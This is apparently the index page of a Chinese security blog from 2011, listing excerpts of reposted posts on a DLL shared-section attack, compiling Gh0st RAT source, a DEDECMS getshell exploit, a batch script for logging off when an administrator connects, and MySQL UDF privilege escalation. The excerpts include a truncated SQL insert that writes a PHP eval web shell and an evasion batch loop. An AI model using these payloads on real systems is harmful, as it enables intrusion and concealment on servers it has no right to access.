共享段攻击 Shared Sections' Attacking

2011-8-22 王健宇 转载

一般常见的某些软件喜欢使用HHOOK类钩子注入DLL,由于他们多数都抄了流行的那个典范代码中一些东西,比如共享段,对于共享段而言,丫是全宇宙可读可写啊(属性是0xD0000040)
于是一种新型的针对某些软件的某些部件的攻击方式诞生鸟~
这里以金山KSAFE的ksfmon.dll举个例子
IDA中打开的样子

我震惊的发现HHOOK~~
想到什么了?
对如果我们直接对丫进行XX
测试代码:
...

阅读全文>>

标签: Shared Attacking

评论(0) 浏览(3322)

\sdk\include\wspiapi.h(47) : error C2265: '<Unknown>' : reference to a zero-sized array is illegal 解决方案

2011-8-17 王健宇 转载

今天,编译了Gh0st源码发现个错误,原来是我VC6有问题哟,呵呵

百度、csdn都去了,终于解决了!不敢独享,特来分享..

编写IP多播程序时,要用到ip_mrep结构,在编译时会遇到如下的错误:

 \sdk\include\wspiapi.h(47) : error C2265: '<Unknown>' : reference to a zero-sized arra...

阅读全文>>

标签: wspiapi.h(47)reference to a zero-sized array is illegal 解决方案

评论(0) 浏览(3866)

DEDECMS拿SHELL EXP

2011-8-14 王健宇 转载

网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell
前题条件,必须准备好自己的dede数据库,然后插入数据:

insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'<?phpeval...

阅读全文>>

标签: dedecms getshell

评论(0) 浏览(2656)

C段时常用的批处理

2011-7-20 王健宇 转载

检测管理员上线就注销自已:

@echo off
:check
choice /C YN /T 10 /D Y
quser find "#16"   && del xx.bat logoff
goto check

每次运行这个 bat 的时候先quser 一下,看当前的会话id 是多少,然后加1 每连接一次就会加1。以上适应使用管理员帐号时。

下面适应使用...

阅读全文>>

标签: C段常用批处理

评论(0) 浏览(3822)

关于MySQL出现Can't open shared library 'udf.dll'错误提示的研究

2011-7-2 王健宇 转载

UDF - User Defined Function 用户自定义函数 。

mysql中支持UDF扩展 ,使得我们可以调用DLL里面的函数来实现一些特殊的功能。
但是对于UDF的具体限制,MYSQL的各个版本各有不同。 下面记录一下:

听说(只是听说,没做测试),在MYSQL 4.1以前的版本中,可以将所有的DLL文件里面的任何函数都注册到MYSQL里面以供MYSQL调用。
无论这个DLL...

阅读全文>>

标签: UDF提权 mysql5.1提权

评论(4) 浏览(6857)

Powered by emlog sitemap